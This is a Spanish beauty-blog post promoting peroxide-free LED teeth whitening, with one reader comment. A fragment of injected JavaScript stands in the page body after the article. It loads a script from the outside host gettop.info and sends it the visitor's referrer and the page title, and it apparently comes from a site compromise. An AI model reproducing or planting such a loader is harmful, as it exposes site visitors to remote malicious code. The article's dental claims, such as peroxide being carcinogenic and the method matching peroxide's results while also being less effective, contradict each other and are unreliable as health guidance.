Salud y belleza » Salud, Salud dental

Blanqueamiento dental sin peróxido, más seguro para tu salud bucal

1 Comentario

blanqueamiento-dental-peroxidoTener una sonrisa bonita implica tener unos dientes más blancos y sin manchas. Existen muchos factores que pueden propiciar que los dientes se amarilleen o que aparezcan manchas, como el café, los antibióticos, el tabaco o la propia degeneración del diente.  Por eso los productos de blanqueamiento dental están cada vez más popularizados en todo el mundo y los equipos de blanqueamiento dental son cada vez más numerosos bien en forma de gel, de tiras o de fundas dentales. Muchos de esos productos de blanqueamiento dental contienen peróxido de hidrógeno, un componente que puede resultar perjudicial para las encías y para la propia dentadura.

El peróxido de hidrógeno también está presente en ciertos dentífricos y enjuagues bucales y no es otra cosa que agua oxigenada, un químico que contiene hidrógeno y oxígeno que se usa también para blanquear papel o textiles. Pero el peróxido de hidrógeno es un producto que puede resultar perjudicial para la salud, sobre todo en grandes cantidades. Puede llegar a irritar las encías, la lengua y el paladar y puede perjudicarlos dientes porque atraviesa fácilmente la encía por lo que acaba desgastando el diente. Además, algunos estudios han demostrado que puede llegar a ser cancerígeno.

Tras haber conocido los efectos secundarios perjudiciales del peróxido de hidrógeno han surgido nuevos tratamientos menos perjudiciales y algo más suaves pero igual de efectivos. Se trata del blanqueamiento dental sin peróxido, un tratamiento estético dental en el que se usa luz LED fría para aclarar hasta 12 tonos en función de la base de cada uno. Lo bueno de este tratamiento es que es totalmente indoloro y no daña la encía ni el esmalte.

blanqueamiento-dental-sin-peroxido

El blanqueamiento dental sin peróxido sería algo menos eficaz que los tratamientos con peróxido, pero son mucho menos agresivos con las encías y el esmalte dental, por lo que te permite blanquear tus dientes sin perjudicar la salud de tu boca.

¿Prefieres el blanqueamiento dental con o sin peróxido?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; } else {

Más consejos de salud y belleza : , ,

One Comment »

  • luna said:

    es muy perjudicial para los dientes. Me he hecho varios tratamientos y se nota que el peróxido me ha dañado las encías y el esmalte. cuando sea más vieja seguro que me tengo que poner dentadura y todo.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.